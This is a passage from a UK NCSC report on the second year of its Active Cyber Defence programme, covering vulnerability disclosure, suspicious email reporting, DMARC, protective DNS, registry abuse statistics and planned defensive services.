• administrative account allocation and risky administrator processes

• USB device logging

• network Shares

In 2019, the host-based capability team are going to build capacity and expand within publicsector to onboard more customers and more devices.

69

Page 70: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

9 Vulnerability Disclosure Platform

One of the things we’ve observed as we’ve become more public is that responsible securityresearchers approach us to report vulnerabilities in UK government services and sites. Obviously,we’re very grateful to those researchers for dealing with these vulnerabilities responsibly but whentalking to them about their experiences of working with UK government in this way, it becameclear it wasn’t always a pleasant experience for the researchers. There wasn’t a single, simpleway to talk to departments about potential vulnerabilities. Some departments didn’t respondappropriately when they were contacted and we even had reports of a couple of really daft thingslike threatening security researchers with legal action for trying to disclose27.

We decided to build a vulnerability disclosure and management platform for all of HMG andto make it as researcher friendly as possible, while still protecting the security of the servicesinvolved. We first ran a pilot to really understand all the moving parts involved and to understandwhere we would need to invest effort to fix things. This ran for a few months before we soughtto build the full operational platform.

This is pretty much a solved problem so we looked to work with industry to do this quicklyand in a proven way. After a competition, we selected HackerOne as the disclosure managementplatform and NCC Group to help us triage reports as they came in. The hardest thing in buildingan enterprise-wide 28 vulnerability management platform is engendering the right processes andbehaviours in those departments that will receive the reports and have to act on them. Thevast majority of HMG departments have worked really well with us on this and we can see theinteraction with security researchers is much better with a concomitant better outcome for allconcerned. There remains work to do in this area, though.

Where departments have a functioning and well-managed vulnerability disclosure process,researchers can continue to disclose directly. However, if they can’t find a good point of contactor don’t get an appropriate response from the department, they can report via our vulnerabilityreporting system. The vulnerability will be triaged and passed to the right point of contact inthe relevant department for remediation. Disclosers and system owners can both track progresson the site. We don’t offer bug bounties for HMG, but we hope that by making the processas frictionless as possible, we can encourage security researchers to disclose vulnerabilities inHMG systems responsibly. We do have NCSC challenge coins for particularly awesome bugs,but there’s a very, very high bar for those!

The service went live properly on 15th November 2018. In the last two weeks of November,we had 11 submissions and 10 were resolved. In December, we had 27 submissions and 19 wereresolved. Of the 38 valid reports received, 56% of the vulnerabilities involved reflective cross sitescripting. XSS vulnerabilities are relatively easy to find and so this small sample of data doesn’tnecessarily tell us much about a systemic issue with XSS vulnerabilities in HMG systems. A fullyear of vulnerability data will be interesting, though. More on this next year.

Obviously, our platform only helps HMG system owners. We need other organisations tohave predictable, easy vulnerability processes so they are able to manage vulnerability reportswell and reduce any potential harm. We’ve started to document our journey building the HMGVulnerability Disclosure Platform in some NCSC blogs29. We’ll continue to do that in the hopethat it will help other organisations build their own processes without necessarily making themistakes we had to.

27It’s difficult to express quite how daft we think this sort of behaviour is.28For the purposes of this work, HMG is just a really big enterprise.29https://www.ncsc.gov.uk/blog-post/ncsc-vulnerability-disclosure-co-ordination and links from there

70

Page 71: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

10 Suspicious Email Incubator

The volume of fraudulent and malicious emails received by the public is increasing. Reportingmalicious and fraudulent events to law enforcement is important as it allows for mitigation andlaw enforcement action, can help provide support to victims and helps us collectively betterunderstand the threat. City of London Police run the national Action Fraud system wherevictims can report cyber crime. The platform today doesn’t provide the kind of tactical andstrategic threat information that we collectively need to prioritise our interventions across theprotective cyber community30. To help tackle this, in 2018 we ran an incubator (that is anearly stage proof of concept) in partnership with Action Fraud to develop and build a prototypesystem to test the automated takedown of malicious content identified from public reports.

To start with, we looked at user needs for each of the actors in the system - a member of thepublic, an ‘organisation’31 and HMG/law enforcement. This led to the basic design intents forthe system:

• simple for the public to use

• invoking the system would be an intuitive action given their likely context32

• provides feedback to the victim automatically

• takes protective action automatically

• provides useful intelligence and data to the NCSC and law enforcement

We also commissioned some large scale user research, performing a mass online survey thathad 2339 individual responses and ten one-to-one phone interviews with a representative sampleof UK public who are big email users. This research gave us some useful data to help usunderstand what we need to build in the future, but the incubator proof of concept focusedon automatically processing a sample of public reports. That automated processing pipelineproduces an opinion of the email which the user gets. Any URLs in the mail that are deemedmalicious are automatically put into the takedown system, which also adds them to a numberof the commercial safe browsing lists, protecting users of many modern browsers even if the siteisn’t taken down.

The incubator ran from 1st to 31st March 2018. During that period, there were 918 submis-sions in total and of those 154 were malicious, roughly 17%. There were 52 individual reportersof suspicious emails and the number of emails submitted and the quality of those submissionsvaried widely. Action Fraud, which was treated as a single reporter for the purposes of this initialexperiment, forwarded 611 emails to the service, of which 74 - 12% - were malicious. Embeddedin all those Action Fraud emails were 3594 unique URLs, of which 89 were malicious. Of those89 malicious URLs, 43 were new to us. During March, those 89 malicious URLs would have beenautomatically taken down, using our existing Takedown Service, if the system was live. Fromthis small sample, it looks like the Great British public is great source of information for helpingprevent cyber crime which we are currently underutilising.

The incubator convinced us this would be a useful service to build in anger. So, since late2018, we have been working with Action Fraud to design and build this new automated reportingsystem. We are aiming to launch it to the public later in 2019. It will be really important to

30This includes, for example, law enforcement’s Cyber PROTECT Network, who scale protective advice out totheir local communities, and through enforcement to bring criminals to justice and reduce national harm.

31This is intended to cover large and small enterprises, but ends up being more relevant to small and mediumenterprises.

32That context being reading an email that they feel is a bit dodgy.

71

Page 72: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

communicate to the public that they can make a difference to enhancing the security of theinternet by reporting the suspicious emails they receive. The more reports received, the greaterthe number of malicious URLs removed from the internet and, more importantly, the better datawe have about the criminals purporting this activity. That data will inform NCSC as to whatnew services could be useful to better protect the UK and should provide law enforcement withdata that will help them understand the strategic threat to the UK and so target protectivemessages to the public.

Looking to the future, the service is planned to be extended to take reports of suspicious textmessages.

72

Page 73: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

11 Scaling

The intent of the Active Cyber Defence programme has always been to test things on the publicsector first and then expand their usage to wider UK and, eventually, internationally in order toget maximum protective benefit. There are some ACD services and functions that NCSC canscale to the wider UK, for example the Takedown Service. There are some that could be deliveredto specific sectors by proxies for the NCSC and there are some that individual organisationsneed to implement themselves. For each service, the scaling outside of public sector has veryspecific characteristics and constraints. Sometimes these are constraints around ensuring privacy,sometimes about adversely affecting a market and sometimes just because there are better waysof achieving something than government delivering it.

11.1 Takedowns

The Takedown Service continues to provide protective benefit to brands related to the UKgovernment but also shows that it is possible to dissuade criminals from using certain hosting byreducing their likely return on investment through proactive removal of malicious content. Webelieve we’ve shown that actively managing the HMG brands has significantly affected the abuseof those brands by criminals in attacks and that actively curating the UK’s delegated IP space(regardless of any brand abused or specific hosting provider) has a direct impact on the harmcaused by malicious attacks. Scaling therefore falls into two strands of works :

1. Encouraging other owners of delegated IP space to actively curate their IP space to proac-tively discover and remove malicious content hosted within. If adopted widely, this couldsignificantly reduce the amount of malicious content hosted globally and create real barriersto entry for cyber crime.

2. Encouraging owners of brands that have significant public trust (or are associated withmonetary transactions) to actively engage brand protection of some form to reduce theability of criminals to spoof those brands, improving the experience of the UK public inrespect of those brands.

We are talking to our international government partners to try to get them to invest incurating their delegated IP space to reduce the prevalence of the hosting of malicious content intheir jurisdictions. While those conversations are ongoing, we’re not seeing a lot of co-ordinatedaction being taken. We’ll continue those conversations, but perhaps pressure from citizens andbusinesses in those countries will help move things along. This will only work if there’s a concertedeffort by a number of countries. Perhaps we’ll start publishing a rank table of where maliciousstuff is hosted next year.

High trust and high impact brand protection is another issue entirely. In the end, many peoplewill say that whether a brand chooses to do proactive brand protection is a purely commercialdecision. We would, respectfully, disagree. For the vast majority of brand-related attacks, thebrand itself sees little direct harm - it’s their customers who are defrauded or otherwise harmed.Even if the company that owns the brand sees no direct damage (through reduced customertrust or fraud claims, for example) we believe that a responsible approach would be to stop basicbrand abuse in their name. The ‘point and laugh’ strategy of publishing league tables seemsto work well in most cases and this is something we will investigate over the coming months inmultiple areas.

There are, of course, high trust brands that are not high value enterprises, for examplecharities. We hope that we can aggregate demand and help others provide a highly cost effective

73

Page 74: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

service across those sectors, as we have done for the HMG brands. That work is likely to beongoing for some time.

11.2 DMARC

Implementing DMARC properly consists of three steps:

1. Publishing the relevant policy records in DNS to tell the world how your mail system worksand the policies you want implemented.

2. Processing the various reports you get from receivers of mail from your domain.

3. Scratching your head and wondering under what set of weird circumstances your maildelivery stuff could cause something this daft to happen.

The first of these is relatively simple provided you know something about how your mail in-frastructure works. There are plenty of scripts and wizards out there to help a domain ownercorrectly construct their policy records to be published in their DNS.

The second takes some hard work. We’ve done a lot of that hard work building the servicesthat perform these functions for public sector. We’ve published our DMARC report processingplatform as open source, here33. This is currently built to allow a single organisation to processand host reporting for multiple domains and organisations. It’s therefore not entirely trivialto set up if you’re a single organisation. That’s not to say it’s impossible, but harder than itneeds to be for a single organisation looking to better protect their email brand. We hope toease deployment for single organisations in due course. Regardless, this allows anyone to processDMARC reports for their domain with some work. We hope that this will help a little withwider adoption of DMARC and further reduce domain abuse by criminals.

The third part is hard. Really hard. It turns out if you have any sort of complexity inyour mail infrastructure or use third parties to send mail on your behalf, actually implementingDMARC is a lot harder than people will have you think. There are plenty of people who’ll tellyou they can get you fully protected using DMARC in a small number of months. It’s possible,but if you’ve got a real-world mail infrastructure that’s grown up over the years, section 3.9 willhold some salutary lessons. That’s not to say that you shouldn’t implement DMARC properly,just that you should take it slowly so you don’t bork anything important. Being able to processthe reports is a critical part of that feedback loop, so make sure you implement something beforewinding up your ‘p =’ policy. Without some sort of report processing, you’ll never know if youdisconnect the world from your outbound email34.

We’re hoping to take some of the research alluded to in section 3.9 and turn it into productionanalytics. Whether we succeed or not, getting something running to store reports from receiversis important, even if you do nothing with them to start with.

One of the interesting things about DMARC is that whether an organisation implementsit (and to what degree they trust that implementation) is effectively public information. Ithas to be so that receivers can query a domain’s policy. Given there’s likely some correlationacross the security spend that an organisation makes, DMARC adoption could be an interestingproxy measure for how much an organisation ‘cares’ about its customers. For example, a bankwithout a DMARC policy or with a published policy of p = none appears to be happy to havemessages delivered in its name to anyone. That probably says something about how they thinkabout security more generally, in terms of investment to protect their customers. So, it may

33https://github.com/ukncsc/mail-check34We’re assuming that in the general case this would be a bad thing, but there are obviously exceptions.

74

Page 75: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

be interesting to take a small number of security related characteristics that can be determinedfrom public information, including use of DMARC, and use them to publish a league table oforganisations in a particular sector. While we’d need to be careful about any inferences madefrom the data, collating and publishing it for a small number of industry sectors would likely bean interesting exercise. We’ll try to do this in 2019.

11.3 Web Check

Web Check is our basic website vulnerability scanning service. None of the tests that it performsare completely unique - there are industry tools that do very similar things. However, with WebCheck we’re in complete control of the scale and aggressiveness of the tests performed and canmake guarantees to the users of the service about how their results will be used. Given someof the stuff we’ve found, that’s important in getting acceptance. Web Check is really aboutbusiness change, rather than the testing per se, in that we need to engender the right cultureand processes in the organisations that run these sites, reducing their fear of such services. Now,we’ve shown that testing at scale can be done without breaking anything and so we are looking tomake Web Check more proactive and also seek to change the delivery model to allow for a muchmore scaled service outside the public sector. This is complex and there are many competingconstraints and variables that we need to optimise. Keep an eye on the NCSC website for moredetails as we progress this. Obviously, we’ll report here next year as well.

11.4 DNS

Scaling protection using DNS blocking is not something we can do ourselves. It would be inap-propriate for NCSC, a part of GCHQ, to run DNS services for anyone other than public sectororganisations. However, the protective and harm reduction effects of careful DNS filtering forcyber security purposes has been proven in the public sector. Scaling this sort of effect outsideof the public sector requires close partnerships with other entities who can provide a gearingfunction for us into another sector.

11.4.1 Academia

The vast majority of networking for Higher and Further Education establishments in the UKis provided by Jisc35 who run the Janet Network which connects over 18 million education andresearch users. Jisc is in the process of introducing filtering for cyber security purposes on theJanet Network Resolver (i.e. the Janet-provided recursive DNS service). This will take a rangeof threat feeds and Jisc is actively building a sector-specific RPZ to take account of the uniquenature of the academic networks in the UK. At the end of 2018, this service is not yet live, butwe expect significant take up and protective effect when it is. We’ll obviously report here nextyear, but will also seek to work with Jisc to publish interesting data in the intervening period.

11.4.2 Health

The health sector in the UK is a bit weird in terms of information and security governance andinfrastructure and IT provision. In many cases, a GP surgery is its own master regarding its ITand security provision. There are standards enforced by the Department of Health, NHS Digitaland the various governance bodies, but it is difficult enforce centrally given such a disparate anddiverse community. Nevertheless, we are in discussion with various bodies in the health sector

35Before 2012, Jisc was known as the Joint Information Systems Committee, or JISC.

75

Page 76: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

to work out how best to deliver protective DNS-like services to the sector as a whole. Thisis unlikely to be delivered by allowing the health sector access to the current protective DNSinfrastructure that protects wider public sector, due to both privacy and scaling concerns. Wehope to have more concrete progress to report in the next report.

11.4.3 The public

The UK ISPs are the best gearing function for the protection of UK citizens. We have had someinitial positive conversations with a number of ISPs and the community is now building. Asdetailed in the previous report, we asked BT to host a MISP36 instance to allow telecoms opera-tors and ISPs to share actionable intelligence between themselves. There are 28 ISPs connectedto the MISP instance as of December 2018, with more connecting all the time. Interestingly,they are a number of international ISPs connected to the MISP instance today. The cost ofconnecting to the community MISP instance is sharing data. All the ISPs currently connectedare actively sharing threat information (normally detections on their customer-facing networks)in a commercially neutral manner.

We are asking for ISPs to protect their customers by default and for free, with customersbeing able to opt out of the protection. While not all ISPs are currently doing this, some are.BT are the only ISP to publish data around their consumer protection as of today, and so theseare the only data we can provide in this report. However, more ISPs are providing this levelof protection to their customers and we hope to be able to provide more fulsome data nextyear. In the interim, we provide the data for BT’s work. BT are automatically protecting all oftheir broadband connections which totals around 6 million customers, the majority of whom areconsumer broadband customers. The consumer DNS platform services around 2.6 million queriesper second at peak, averaging approximately 130 billion queries per day. BT use a combinationof commercial threat feeds, indicators shared by others (including the NCSC ‘secret sauce’) andtheir own research. They are currently concentrating on malware-related domains and block onaverage 110 million malicious connections per month. The peak for blocking occurred in October2018, with 135 million malicious, malware-related connections blocked that month. More detailsof the BT platform performance can be found here37.

We are also working with the World Economic Forum to see how we can promote a similarapproach globally.

11.5 The UK ISPs

Last year, we reported that we had written to the ISP Association, the trade body for the majorityof UK internet service providers to ask them to recommend the following set of measures to theirmembers :

• Ensure that DMARC is processed properly and that their infrastructure does not breakany of the prerequisite protocols, such as SPF and DKIM.

• Ensure that it is easy for their customers to properly deploy DMARC on their customerdomains.

• Implement our SS7 filtering minimum standard and the current BGP suggestions andcommit to working with us on future BGP enhancements.

36MISP is the Malware Information Sharing Platform, available at https://misp-project.org37https://www.btplc.com/Digitalimpactandsustainability/Buildingbetterdigitallives/cyberindex/index.htm

76

Page 77: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

• Properly filter management protocols (for example TR-069 and SNMP) and other poten-tially dangerous protocols (for example telnet and UPnP) from the internet to residentialbroadband by default (with an opt out for users)

• By default, protect their users from known cyber attacks (with an opt out for users). Weare not specifying how this should be done or what threat feeds are used, but offer ourseither directly or through a community MISP platform.

We received a positive response from ISPA in early 2018 and have been working to turn thisinto tangible action, but more concerted effort is needed here.

11.6 The UK Registry

Nominet, the UK Registry, has two programmes to help make the .UK namespace more trusted.Each is designed to proactively stop malicious domains in the .UK namespace causing harm.

11.6.1 Domain Health

Domain Health is a free initiative created to alert registrars of names in .UK of domains theyadminister which are implicated in spam, phishing, malware and botnet activity and to providethem with practical advice as to what they can do to address these problems. Threat intelligenceis collected from various open source and commercial sources and then reports are collated anddelivered via email or an API to the relevant registrars. A ranking and scoring system is usedto inform registrars how they perform in relation to other registrars.

During the month of December 2017 there were 133,845 domains linked to active reports inthe .UK registry out of a total number of 12,040,322 domains. This equates to around 111 per10,000 domains. 75% of the reports relate to phishing, 8% to spam and 17% to malware.

During the month of December 2018 there were 145,595 active reports in the .UK registryout of a total number of 11,999,151 domains. This equates to around 121 per 10,000 domains.44% of the reports relate to phishing, 46% to spam and 10% to malware.

This shows a relatively constant rate of abuse over in the .UK namespace over the year,but a significant shift in the character of the malicious domains. As far as we know, no otherregistry does similar proactive work to curate the health of their namespace, so we do nothave a comparator to show whether the level of abuse in the UK namespace is above or belowaverage. While it would be nice to assert that the level of phishing and malware abuse in the.UK namespace has dropped because of our other work, we do not have the data to show thatconclusively at the moment.

11.6.2 Domain Watch

Domain Watch is an anti-phishing initiative to further increase the security of the .UK zone andprotect .UK end users from malicious phishing activity. The aim of Domain Watch is to quicklyidentify and suspend newly registered domains that are obvious phishing attempts. Analysingdomains using a proprietary algorithm, high risk registrations are then manually checked toensure that legitimate registrations are not impacted.

Since the launch of the pilot in July 2018, Nominet have suspended 434 phishing domains.Of these domains, 124 were targeting the public sector including local authorities, HMRC, NHS,and police. 145 domains were targeting private sector organisations such as Amazon, Google,Apple, and Microsoft. Financial institutions are heavily targeted as part of phishing campaignsand 143 domains were suspended targeting banking organisations including HSBC, Barclays,

77

Page 78: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Santander, Metrobank, and Lloyds Bank. Domain Watch also incorporates an appeal processfor holders of suspended domains to appeal the decision by providing evidence of legitimate use.

11.6.3 Tackling criminal activity

Nominet collaborate with ten organisations that send reports of criminal usage of domains,mainly relating to fraud. The latest criminality report (available here38) shows that the numberof .UK domains suspended between 1 November 2017 and 31 October 2018 has again doubledyear on year to 32, 813. This is an increase on the 16, 632 suspensions over the preceding 12-month period which represents around 0.27% of the more than 12 million .UK domains currentlyregistered. This proactive work complements the takedown service run for the NCSC.

11.7 Critical National Infrastructure

One of the hardest jobs of any national cyber security centre is to help operators of criticalinfrastructure better secure their systems. This is partly because of the unique nature of someof the operational systems concerned, and partly because operators of these services need tobe very careful when changing systems as any failures potentially impact the citizens of theUK in their everyday lives. It follows that cyber security services that are useful in enterpriseand citizen-facing environments may have a different effect in the critical national infrastructureoperational technology domain. So, we are looking at how the current ACD services could beuseful in helping critical national infrastructure operators better protect their organisations andoperational systems. We intend to try some experiments during 2019 to see what impact theseservices can have in the CNI.

38https://www.nominet.uk/32000-uk-domains-suspended-as-law-enforcement-and-industry-keep-uk-safe/

78

Page 79: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

12 Future work

We have a pipeline of interesting ideas that we want to test out to see if they provide real worldbenefit. Here we present a small number of early stage ideas that we’re looking to build in thenext year. These may or may not work, and may or may not provide the benefit we want, buteach will be judged in an evidence-based way and reported on here in due course.

12.1 Exercise in a Box

One of the things we’ve learned since the NCSC was created is that many organisations don’trehearse their incident management plan. In fact, many don’t have an incident managementplan at all. Exercising is a well understood way of practising incident management to refine anorganisation’s playbook. Knowing how to respond is critical - innovating during an incident isgenerally a bad idea.

Exercise in a Box is intended to be a unique online cyber exercising tool to enable organisationsto understand their preparedness in managing and responding to cyber attacks. The tool providesexercises based on common cyber threats which organisations can practise as many times as theywant. It brings together everything an organisation needs for setup, planning, delivery and post-exercise activity, all in one place. Organisations sign on, set their profile, pick their exercise(either a discussion or a technical simulator), download the materials, and then complete it intheir own time, in a safe environment. There is a help facility should an organisation need it,but the tool is designed to be a self-help product and you don’t need to be an expert to use it.It is also free to use.

The exercises in the first iteration are designed for small and medium enterprises, local gov-ernment and similar organisations, but other organisations could benefit from using it, dependingon their exercising needs. Exercise in a Box has been developed as stepping stone to the moreadvanced tools on the market.

The tool also links to relevant NCSC advice and guidance and it will continue to evolve aswe get user feedback. Given our understanding of the user need, we expect Exercise in a Box toget significant usage once formally launched in early 201939.

12.2 Logging Made Easy

Everyone knows that the logging and audit of a network is important to be able to spot attacksand to help investigate incidents. During incidents, the typical questions asked include :

• What has happened?

• What is the impact?

• What should we do next?

• Has any post-incident remediation been effective?

• Are our security controls working?

Being able to answer even some of these questions will help you both detect a problem andrecover from any subsequent harm more quickly. We went into more detail in a blog post here40.This explains that logging isn’t a trivial exercise as system owners need to decide what to log,

39Exercise in a Box is actually a live service at the time of writing. It’s available athttps://www.ncsc.gov.uk/information/exercise-in-a-box.

40https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes

79

Page 80: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

where to store it, how to analyse it and so on. For small organisations, answering these questionsand working out how to actually implement the associated technology may consume a significantamount of their IT budget.

So, we are working with Cabinet Office Government Security Group and our partners in NCCGroup to try to create a basic logging and analysis solution that is easy to understand, deployand use in most small networks. It’s called Logging Made Easy and, importantly, it will be free.

Lots of open source and free software, tools and guidance are already available and our intentis to point to and reuse as much of this as possible. We hope our initial alpha release will helpsystem owners monitor their Windows networks for cyber security issues and help them mitigateany incidents they encounter. We expect the alpha release in early 201941.

12.3 Internet Weather Centre

We publish guidance and give advice to help various entities, from huge enterprises through smallbusinesses to the individual citizen, with their cyber security. We’re often asked for advice onspecific software or infrastructure and whether it’s secure enough for a particular use or howto configure it. This need drives a decent amount of our advice and guidance production. Inorder to publish anything, we need to research the product or service and really understand thesecurity implications of it. In order to be the most relevant we can be, we need to prioritiseresearch on products and services that people use, rather than ones that are just academicallyinteresting for us. As a side effect of understanding the most popular products and services,we start to understand the digital makeup of the UK. That should help us better understandthe effect of specific vulnerabilities or exploits on the whole of the UK, but also reason aboutour national dependence on specific suppliers. This is measuring things, rather than guessing orusing very variable surveys to infer things.

The Internet Weather Centre aims to draw on multiple data sources to allow us to reallyunderstand the digital landscape of the UK. We’ve already run a number of research experimentswhich aim to answer questions like ‘What are the most commonly used cloud services?’ But wewant to answer much more generic questions, along the lines of

• Which are the most popular providers in this technology class? (e.g. authoritative DNS,content delivery networks, IaaS, instant messaging)

• What is the adoption of a particular security control in the UK? (e.g. DMARC, CertificateAuthority Authorization)

• What insecure infrastructure can we see exposed to the internet and to whom does itbelong?

As well as getting an overview of what the UK looks like, we can also spot trends and actaccordingly. For example, if we see that a particular SaaS is becoming popular, we can dedicateresearch into understanding how secure it is straight out of the box, and how best to configureit to meet our security standards. We can then release this as guidance to help those adoptingit do so securely, also working directly with the provider if necessary to help them make anysecurity uplifts necessary.

In 2019, the Internet Weather Centre is lined up to be built into a prototype, taking in multiplesources of detail and built to meet the ACD principles - automated, scalable, and measurable.

41Logging Made Easy is actually released as an alpha at the time of writing. It’s available fromhttps://www.ncsc.gov.uk/blog-post/logging-made-easy.

80

Page 81: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

12.4 Infrastructure Check

The Infrastructure Check service vision is to develop a free, web-based portal where public sectorusers will supply details of their internet facing systems and schedule regular vulnerability scans.These results of these scans will identify weaknesses on internet exposed infrastructure, identify-ing misconfiguration, poor patch management processes and help drive behavioural change suchthat weaknesses are removed and resulting in a reduction in overall cyber risk. This is an obviousextension of the Web Check service and the target audience will be similar. Infrastructure Checkwill concentrate on services exposed over TCP/IP and UDP/IP to start with. We’ll be checkingfor the lots of different exposed services, including the most obvious such as

• remote access VPN services (e.g. IPSec, TLS)

• remote desktop services (e.g. RDP, VNC)

• remote management services (e.g. Telnet, SSH)

• IP-based voice/video services (e.g. SIP)

• ‘network infrastructure’ services (e.g. routing protocols, management protocols)

• file sharing services (e.g. FTP, SMB)

A user will be able to better understand their exposure to the internet of critical services andtake action, guided by NCSC, to make things more secure. We also hope to be able to identifycommon misconfigurations and out of date implementations and proactively inform customers.Infrastructure Check is currently in Discovery and will be moving forward to Alpha in 2019. Wehave not decided on a delivery model yet and we may end up using existing industry services asa basis for this.

12.5 Supplier Check

The Supplier Check service will use passive techniques to discover suppliers to government public-facing IT footprint and then perform analytics to identify relevant security and configurationinformation. We want to use this to see if we can infer supply chain risk from analysis of theconfiguration of the public-facing infrastructure of those suppliers. Obviously, this will be veryopen to interpretation and potentially open to being gamed by suppliers, but it may be a usefulset of data as part of a wider understanding of supply chain risk.

The automated solution is specifically designed to rely on proprietary analysis of an organ-isation’s public, internet-facing footprint (e.g. web and application servers, DNS, and email).Again, this assumes that the effort put into configuration of their publicly visible security proto-cols is a proxy for an organisation’s more general view of security. Intuitively, this doesn’t seemdumb, but we’ll be looking for the data to prove or disprove this. We expect the pilot to runfrom March to the end of August 2019.

Raw data is gathered non-intrusively from outside an organisation by performing a light webcrawl, much like a search engine, and obeying robots.txt instructions, combining this with otheropen source and proprietary information. As such, there is no requirement for any supplier-proprietary information or access to any IT systems managed by the contracting agency or theirsuppliers. There is no integration with any systems containing customer records, transactiondata, or sensitive data of any kind, unless they are trivially accessible from the internet42. We

42This case will likely drive an early exit from the decision cycle as to whether to use a particular supplier.

81

Page 82: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

will be providing third party suppliers with a report highlighting key areas for improvement andthen revisiting these after 6 months to see how much their cyber security stance has improved. Itwill be interesting to see if we can show objectively that the organisational security of a particularsupplier (and by extension the broad supply chain risk they bring) can be inferred in this way.We’re certainly not sure!

82

Page 83: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

13 Conclusion

In November 2016, we posited an ecosystem of relatively simple services working together toobjectively and measurably make the UK safer from cyber attack. In particular, we suggestedthat we could begin to tackle the commodity attacks that directly affect the majority of people inthe UK, focusing on affecting the return on investment these attacks attract. We wish to protectthe majority of the people from the majority of the harm from the majority of the attacks themajority of the time. We are not expecting our interventions to be perfect or to defend againstevery single type of cyber attack. However, we continue to believe that government activelydoing something, providing real services and generating real data and analysis has to be a firststep in demystifying cyber security, and beginning to tackle the impacts of cyber attack at scale.

This paper, the second in what will become an annual release, has documented the work wehave done with our partners in 2018 and again showed, with real, unvarnished data, the effectwe are having on the security of the UK public sector and the wider UK cyber ecosystem. Insome cases, we haven’t managed to do as much as we hoped, but work will continue to scalethese services and more importantly the effects they have, both in the UK and internationally.The year 2018 also saw an independent review of the NCSC Active Cyber Defence programmeby an academic partner. This King’s Policy Paper, ‘Active Cyber Defence: a public good for theprivate sector’, is available here43.

While the Active Cyber Defence programme is still young, we believe that it has demonstrated- in a sustained way - the value of the new approach adopted by the government in the NationalCyber Security Strategy. However, we are not the only organisation with good ideas and we arenot the only country connected to the internet. As per last year, we would welcome partnershipswith people and organisations who wish to contribute to the ACD service ecosystem, analysisof the data or contributing data or infrastructure to help us make better inferences. In 2019,we will make a concerted effort to encourage other government cyber security agencies aroundthe world to consider the effects of our ACD programme and, if they wish, try to help themimplement similar services.

We hope that the ACD programme in general and this paper and future ones like it helpto better inform people, enterprises and governments about the possibilities of national scaleprotection through the widespread adoption of relatively simple services that are driven byevidence and data, rather than hyperbole and fear. We believe that evidence-based cyber securitypolicy is a possibility. If you’re interested in being a part of it, look on the NCSC website foropportunities to work with us either as an employee, as part of the Industry 100 scheme or evenin other ways.

43https://www.kcl.ac.uk/policy-institute/research-analysis/active-cyber-defence

83

Page 84: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

To find out more visit: ncsc.gov.uk

© Crown copyright 2019. NCSC information licensedfor re-use under Open Government Licence (http://www.nationalarchives.gov.uk/doc/open-government-licence).

@NCSC National Cyber Security Centre